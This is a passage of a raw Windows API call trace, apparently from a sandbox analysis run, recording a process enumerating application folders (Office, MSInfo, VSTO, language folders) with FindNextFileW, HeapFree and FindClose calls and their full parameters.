hHeap=0x680000) returned 1 [0178.528] FindNextFileW (in: hFindFile=0x43a2bd8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076a026, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0178.528] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.528] FindNextFileW (in: hFindFile=0x43a2bd8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076a7a6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0178.529] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.529] FindNextFileW (in: hFindFile=0x43a2bd8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076afd8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LanguageModel", cAlternateFileName="LANGUA~1")) returned 1 [0178.529] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.529] FindNextFileW (in: hFindFile=0x43a2bd8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076b52b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lt-LT", cAlternateFileName="")) returned 1 [0178.529] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.529] FindNextFileW (in: hFindFile=0x43a2bd8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076ba6e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lv-LV", cAlternateFileName="")) returned 1 [0178.529] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.529] FindNextFileW (in: hFindFile=0x43a2bd8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a4376e, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd1f30e81, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd1f30e81, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x19f200, dwReserved0=0x0, dwReserved1=0x0, cFileName="micaut.dll", cAlternateFileName="")) returned 1 [0178.530] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.530] FindNextFileW (in: hFindFile=0x43a2bd8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076c75d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0178.809] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.809] FindNextFileW (in: hFindFile=0x43a2bd8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080d57c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0178.810] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.810] FindNextFileW (in: hFindFile=0x43a2bd8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080d988, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0178.810] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.810] FindNextFileW (in: hFindFile=0x43a2bd8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080ddb8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0178.810] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.810] FindNextFileW (in: hFindFile=0x43a2bd8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080e0f5, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ro-RO", cAlternateFileName="")) returned 1 [0178.811] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.811] FindNextFileW (in: hFindFile=0x43a2bd8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e38953f, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e38953f, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e38953f, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2b600, dwReserved0=0x0, dwReserved1=0x0, cFileName="rtscom.dll", cAlternateFileName="")) returned 1 [0178.811] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.811] FindNextFileW (in: hFindFile=0x43a2bd8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe46546cb, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe46546cb, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0xb3200, dwReserved0=0x0, dwReserved1=0x0, cFileName="ShapeCollector.exe", cAlternateFileName="")) returned 1 [0178.811] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.811] FindNextFileW (in: hFindFile=0x43a2bd8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080ec25, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sl-SI", cAlternateFileName="")) returned 1 [0178.811] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.812] FindNextFileW (in: hFindFile=0x43a2bd8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c7ae2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sr-Latn-RS", cAlternateFileName="SR-LAT~1")) returned 1 [0178.812] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.812] FindNextFileW (in: hFindFile=0x43a2bd8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c820e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0178.812] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.812] FindNextFileW (in: hFindFile=0x43a2bd8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d14d081, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe467a929, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe467a929, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0xa400, dwReserved0=0x0, dwReserved1=0x0, cFileName="TabIpsps.dll", cAlternateFileName="")) returned 1 [0178.812] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.812] FindNextFileW (in: hFindFile=0x43a2bd8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x989f72a7, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd1aad768, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd1aad768, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x109400, dwReserved0=0x0, dwReserved1=0x0, cFileName="TipRes.dll", cAlternateFileName="")) returned 1 [0178.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.813] FindNextFileW (in: hFindFile=0x43a2bd8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c8ed8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uk-UA", cAlternateFileName="")) returned 1 [0178.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.813] FindNextFileW (in: hFindFile=0x43a2bd8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c93df, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3ecc0a, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0178.813] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.813] FindNextFileW (in: hFindFile=0x43a2bd8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c97fd, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3ecc0a, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0178.814] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.814] FindNextFileW (in: hFindFile=0x43a2bd8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c97fd, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3ecc0a, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0178.814] FindClose (in: hFindFile=0x43a2bd8 | out: hFindFile=0x43a2bd8) returned 1 [0178.814] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.815] FindNextFileW (in: hFindFile=0x43a2cd8, lpFindFileData=0x339f584 | out: lpFindFileData=0x339f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa098a4c6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x71143a45, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="MSInfo", cAlternateFileName="")) returned 1 [0178.816] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.816] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x463aec8d, ftCreationTime.dwHighDateTime=0x1d2fa08, ftLastAccessTime.dwLowDateTime=0x63793f1, ftLastAccessTime.dwHighDateTime=0x1d2fa0a, ftLastWriteTime.dwLowDateTime=0x463aec8d, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x5a600, dwReserved0=0x0, dwReserved1=0x0, cFileName="msinfo32.exe", cAlternateFileName="")) returned 1 [0178.817] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.817] FindNextFileW (in: hFindFile=0x43a2cd8, lpFindFileData=0x339f584 | out: lpFindFileData=0x339f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd99442a7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd9f60362, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd9f60362, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="OFFICE16", cAlternateFileName="")) returned 1 [0178.819] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.819] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xd9f60362, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xa0a26299, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xda982389, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office Setup Controller", cAlternateFileName="OFFICE~1")) returned 0 [0178.819] FindClose (in: hFindFile=0x43a2fd8 | out: hFindFile=0x43a2fd8) returned 1 [0178.819] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.819] FindNextFileW (in: hFindFile=0x43a2cd8, lpFindFileData=0x339f584 | out: lpFindFileData=0x339f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd99442a7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd99442a7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd99442a7, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="OfficeSoftwareProtectionPlatform", cAlternateFileName="OFFICE~1")) returned 1 [0178.820] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.820] FindNextFileW (in: hFindFile=0x43a2cd8, lpFindFileData=0x339f584 | out: lpFindFileData=0x339f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4accd6e1, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x4accd6e1, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x4accd6e1, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Source Engine", cAlternateFileName="SOURCE~1")) returned 1 [0178.820] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.820] FindNextFileW (in: hFindFile=0x43a2cd8, lpFindFileData=0x339f584 | out: lpFindFileData=0x339f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0b5538f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a412e70, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 1 [0178.823] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.823] FindNextFileW (in: hFindFile=0x43a2cd8, lpFindFileData=0x339f584 | out: lpFindFileData=0x339f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0b56882, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="TextConv", cAlternateFileName="")) returned 1 [0178.823] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.823] FindNextFileW (in: hFindFile=0x43a2e98, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b209410, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0b5787e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0178.823] FindClose (in: hFindFile=0x43a2e98 | out: hFindFile=0x43a2e98) returned 1 [0178.823] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.823] FindNextFileW (in: hFindFile=0x43a2cd8, lpFindFileData=0x339f584 | out: lpFindFileData=0x339f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b209410, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0b57d42, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Triedit", cAlternateFileName="")) returned 1 [0178.824] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.824] FindNextFileW (in: hFindFile=0x43a2f58, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b209410, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0b58502, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0178.824] FindClose (in: hFindFile=0x43a2f58 | out: hFindFile=0x43a2f58) returned 1 [0178.824] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.824] FindNextFileW (in: hFindFile=0x43a2cd8, lpFindFileData=0x339f584 | out: lpFindFileData=0x339f584*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xbcd0fab8, ftCreationTime.dwHighDateTime=0x1d327b7, ftLastAccessTime.dwLowDateTime=0xa0b594b8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x2ce22546, ftLastWriteTime.dwHighDateTime=0x1d327be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="VC", cAlternateFileName="")) returned 1 [0178.824] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.824] FindNextFileW (in: hFindFile=0x43a2cd8, lpFindFileData=0x339f584 | out: lpFindFileData=0x339f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0b59a78, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x71169cb5, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="VGX", cAlternateFileName="")) returned 1 [0178.825] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.825] FindNextFileW (in: hFindFile=0x43a2cd8, lpFindFileData=0x339f584 | out: lpFindFileData=0x339f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49ecb94e, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x4ae972f5, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="VSTO", cAlternateFileName="")) returned 1 [0178.833] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0178.833] FindNextFileW (in: hFindFile=0x43a2a98, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd6700, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5dbd6700, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x18888, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="VSTOInstaller.exe", cAlternateFileName="VSTOIN~1.EXE")) returned 1 [0178.834] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.834] FindNextFileW (in: hFindFile=0x43a2b58, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd6700, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5dbd6700, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x29080, dwReserved0=0x0, dwReserved1=0x0, cFileName="vstoee.dll", cAlternateFileName="")) returned 1 [0178.834] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.835] FindNextFileW (in: hFindFile=0x43a2cd8, lpFindFileData=0x339f584 | out: lpFindFileData=0x339f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49ecb94e, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x4ae972f5, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, 